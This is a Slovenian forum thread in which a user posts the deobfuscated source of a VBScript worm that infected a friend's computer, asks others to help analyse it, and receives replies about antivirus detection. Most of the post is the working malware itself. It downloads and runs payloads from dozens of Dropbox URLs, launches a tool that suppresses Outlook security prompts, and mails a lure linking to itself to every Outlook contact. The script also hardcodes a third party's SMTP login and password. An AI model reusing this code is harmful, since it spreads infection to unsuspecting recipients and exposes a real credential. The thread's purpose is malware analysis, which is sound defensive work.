Reverse engineering virusa

Danes se je moji znanki dogodila neprijetna stvar, namreč očitno je nekje odprla neko VB Scripto in okužila računalnik z virusom. Bi bilo pa fajn ugotoviti kaj počne in kako jo odstraniti. Stvarca se širi preko maila in facebooku, tako da sm lahko tudi jaz prišel do svojega izvoda. Problem je, da je stvar očitno nova in jo AV-ji še ne zaznajo, je pa kar precej kompleksno zgrajena. Torej, širi se preko obfuscatane VB scripte (random ime npr. oosdfk75.zip; notri je oosdfk75.vbs), koda, kakor mi jo je uspelo deobfuscatat je spodnja

On Error Resume Next Randomize Dim tmpDir: tmpDir = "C:\temp" Dim tmpFileName: tmpFileName = getName(int(rnd * 10) + 5) & "." & getName(2) Dim pepeSource Dim selfLink pepeSource = "http://dl.dropboxusercontent.com/s/rxkbtjtpvzgrra4/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/8w0ldbbf0ndb78l/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/ubdlqx6leqy3gw8/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/h6znwxvjs3rpvw7/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/eclb44x6t01lxsg/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/ywfb7lux4of25au/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/6xm9cw2dkmo0q0k/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/xoqbc490nurxeow/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/ja2hb47rwkzqqo8/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/y8lpltcjxuf81n7/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/8zaselhbwkdw3w7/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/xfyakmoo7gzv4j3/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/bxlxjku6u6i5mqq/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/gs3eq8r00yn4of8/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/6e7xw9qrovheepd/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/073he87wsizsn14/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/z4jl4ckge68ly86/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/2v5auf9b4wh1sas/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/clw9swn6w7ez8yz/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/yc4ju3wap4y71va/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/l93ij60w4jsgj6e/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/ll2ydaxt1qesxbg/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/h5fy4kinzcqpo0e/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/1dxzjip2h8ep2fl/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/98yoxgz9nh00lxp/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/r7ll4mze3xigpkb/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/da9mznunn0kz588/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/36gldtb1ngjhjg1/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/h3bt7tygbf91jsm/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/m26w3f17a8zc3tr/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/vntfj2zc6nygvv2/xml.zip?dl=1" yesSource = "http://dl.dropboxusercontent.com/s/o0d1ce9toe9a9rq/clickyes.dat?dl=1,http://dl.dropboxusercontent.com/s/f2h777xsqv8cepb/clickyes.dat?dl=1,http://dl.dropboxusercontent.com/s/ui6zo977ttx7bqy/clickyes.dat?dl=1,http://dl.dropboxusercontent.com/s/tsv6l172jqlt0tf/clickyes.dat?dl=1,http://dl.dropboxusercontent.com/s/d9bt6hyvhjjwwkd/clickyes.dat?dl=1" vbsSource = "http://dl.dropboxusercontent.com/s/uw92ooko73yincw/Documents.zip?dl=1,http://dl.dropboxusercontent.com/s/j7eiyij7wshwhoe/Documents.zip?dl=1,http://dl.dropboxusercontent.com/s/x2npx95tzmk724r/Documents.zip?dl=1,http://dl.dropboxusercontent.com/s/i0orsrnizec9fr0/Documents.zip?dl=1,http://dl.dropboxusercontent.com/s/liwvrveoh67qbnw/Documents.zip?dl=1" createTmpDir() getPepe pepeSource, tmpDir & "\" & tmpFileName pwnpwn("regsvr32 /s " & tmpDir & "\" & tmpFileName) getPepe yesSource, tmpDir & "\clickyes.exe" pwnpwn(tmpDir & "\clickyes.exe") WScript.Sleep(3000) selfLink = getSelfLink(vbsSource) if selfLink = "" then Else spreadTheWord "kate.lisbon" & Int(rnd * 1990) + 1970 & "@yahoo.de", selfLink, "Documents.zip", "ALL" End If Sub pwnpwn(what) Set oShell = WScript.CreateObject("WSCript.shell") oShell.run what End Sub Sub createTmpDir() Set oFSO = CreateObject("Scripting.FileSystemObject") If Not oFSO.FolderExists(tmpDir) Then Set objFolder = oFSO.CreateFolder(tmpDir) End If End Sub Function getSelfLink(source) source = Split(source, ",") for each link in source Dim xHttp: Set xHttp = createobject("microsoft.xmlhttp") Dim bStrm: Set bStrm = createobject("adodb.stream") xHttp.Open "GET", link, False xHttp.Send If(xHttp.Status = 200) then getSelfLink = link Exit Function End If Next End Function Sub getPepe(source, destination) source = Split(source, ",") for each link in source Dim xHttp: Set xHttp = createobject("microsoft.xmlhttp") Dim bStrm: Set bStrm = createobject("adodb.stream") xHttp.Open "GET", link, False xHttp.Send If(xHttp.Status = 200) then With bStrm .type = 1 .open .write xHttp.responseBody .savetofile destination, 2 End With For a = 0 to int(rnd * 10) + 3 WScript.Sleep(1000) Next Exit Sub End If Next End Sub Function getName(numOfChars) Dim currentString Dim charset charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" For i = 0 to numOfChars currentString = currentString & Mid(charset, int(Len(charset)*rnd+1), 1) Next getName = currentString End Function Sub SendMessage(MailFrom, MailTo, Subject, Message) Dim ObjSendMail Set ObjSendMail = CreateObject("CDO.Message") With ObjSendMail.Configuration.Fields .Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 .Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "mailgate.otenet.gr" .Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 587 .Item("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = False .Item("http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout") = 60 .Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 .Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "nastia26@otenet.gr" .Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "nat1978#" .Update End With ObjSendMail.To = MailTo ObjSendMail.Subject = Subject ObjSendMail.From = MailFrom ObjSendMail.HTMLBody = Message ObjSendMail.Send Set ObjSendMail = Nothing End Sub Function ElementInArray(aMyArray, strLookingFor, compare) ElementInArray = (UBound(Filter(aMyArray, strLookingFor, True, compare)) > - 1) End Function Sub spreadTheWord(SenderEmail, URL, DOCNAME, mailFilter) Const olFolderContacts = 10 isThere = Array() Set objOutlook = CreateObject("Outlook.Application") Set objNamespace = objOutlook.GetNamespace("MAPI") Set colContacts = objNamespace.GetDefaultFolder(olFolderContacts).Items For Each objContact In colContacts If objContact.Email1Address = "" Then Else If mailFilter <> "ALL" And InStr(objContact.Email1Address, mailFilter) Then If ElementInArray(isThere, objContact.Email1Address, compare) Then Else SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for.
" & DOCNAME & "
Keep me posted for any complaints or anything.
Thank you." ReDim Preserve isThere(UBound(isThere) + 1) isThere(UBound(isThere)) = objContact.Email1Address End If ElseIf mailFilter = "ALL" Then If ElementInArray(isThere, objContact.Email1Address, compare) Then Else SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for.
" & DOCNAME & "
Keep me posted for any complaints or anything.
Thank you." ReDim Preserve isThere(UBound(isThere) + 1) isThere(UBound(isThere)) = objContact.Email1Address End If End If End If If objContact.Email2Address = "" Then Else If mailFilter <> "ALL" And InStr(objContact.Email2Address, mailFilter) Then If ElementInArray(isThere, objContact.Email2Address, compare) Then Else SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for.
" & DOCNAME & "
Keep me posted for any complaints or anything.
Thank you." ReDim Preserve isThere(UBound(isThere) + 1) isThere(UBound(isThere)) = objContact.Email2Address End If ElseIf mailFilter = "ALL" Then If ElementInArray(isThere, objContact.Email2Address, compare) Then Else SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for.
" & DOCNAME & "
Keep me posted for any complaints or anything.
Thank you." ReDim Preserve isThere(UBound(isThere) + 1) isThere(UBound(isThere)) = objContact.Email2Address End If End If End If If objContact.Email3Address = "" Then Else If mailFilter <> "ALL" And InStr(objContact.Email3Address, mailFilter) Then If ElementInArray(isThere, objContact.Email3Address, compare) Then Else SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for.
" & DOCNAME & "
Keep me posted for any complaints or anything.
Thank you." ReDim Preserve isThere(UBound(isThere) + 1) isThere(UBound(isThere)) = objContact.Email3Address End If ElseIf mailFilter = "ALL" Then If ElementInArray(isThere, objContact.Email3Address, compare) Then Else SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for.
" & DOCNAME & "
Keep me posted for any complaints or anything.
Thank you." ReDim Preserve isThere(UBound(isThere) + 1) isThere(UBound(isThere)) = objContact.Email3Address End If End If End If Next Const olFolderInbox = 6 Set objFolder = objNamespace.GetDefaultFolder(olFolderInbox) Set colItems = objFolder.Items For Each objItem in colItems If mailFilter <> "ALL" And InStr(objItem.SenderEmailAddress, mailFilter) Then If ElementInArray(isThere, objItem.SenderEmailAddress, compare) Then Else SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for.
" & DOCNAME & "
Keep me posted for any complaints or anything.
Thank you." ReDim Preserve isThere(UBound(isThere) + 1) isThere(UBound(isThere)) = objItem.SenderEmailAddress End If ElseIf mailFilter = "ALL" Then If ElementInArray(isThere, objItem.SenderEmailAddress, compare) Then Else SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for.
" & DOCNAME & "
Keep me posted for any complaints or anything.
Thank you." ReDim Preserve isThere(UBound(isThere) + 1) isThere(UBound(isThere)) = objItem.SenderEmailAddress End If End If Next End Sub 

Kakor je videti stvar torej downloada tri stvari iz dropboxa documents.zip, xml.zip in pa clickyes.dat; documents.zip je obfuscated source code virusa, ki se pošilja in širi drugim preko facebooka in emaila (predvidevam, da preko outlook address liste); xml.zip in pa clickyes.dat sta pa kakor mi je uspelo do sedaj ugotoviti executable fajla (.exe) samo z drugo končnico, ni mi pa še uspelo ugotoviti kaj naredita, torej če se komu ljubi in ima čas na hitro reverse engineerat, bi pomoč prišla zelo prav. Prilagam zazipane fajle, saj bodo morda kmalu izbrisani z Dropboxa - PREVIDNO pri odpiranju http://www61.zippyshare.com/v/31759391/...

UPDATE:
Clickyes.exe je zelo verjetno tole http://www.contextmagic.com/express-cli... in omogoči main programu v xml.zip pošiljanje pošte brez prompta...
"Express ClickYes is a tiny program that runs in the system tray and automatically clicks the Yes button for the Outlook security prompt, that asks you to confirm mail sending from third party applications or access to Outlook's address book."

UPDATE2: očitno gre za nek tip(xml.zip) bitcoin minerja...

Hvala za pomoč

NOD32: a variant of Win32/Injector.BEIE trojan

Kdo to pravi?

Sicer pa uploadaj sem pa boš dobil report... https://www.virustotal.com/